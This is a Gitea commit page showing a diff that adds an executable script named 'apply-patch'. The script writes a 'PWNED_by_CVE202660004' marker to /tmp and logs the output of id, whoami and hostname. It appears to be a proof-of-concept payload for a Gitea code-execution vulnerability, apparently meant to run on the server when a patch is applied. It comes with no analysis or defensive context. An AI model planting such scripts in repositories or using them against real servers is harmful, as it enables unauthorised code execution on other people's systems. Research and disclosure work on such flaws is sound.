apply-patch
This commit is contained in:
Executable
+6
@@ -0,0 +1,6 @@
|
||||
#!/bin/sh
|
||||
|
||||
echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt
|
||||
id >> /tmp/gitea_pwn.txt
|
||||
whoami >> /tmp/gitea_pwn.txt
|
||||
hostname >> /tmp/gitea_pwn.txt
|
||||
Reference in New Issue
Block a user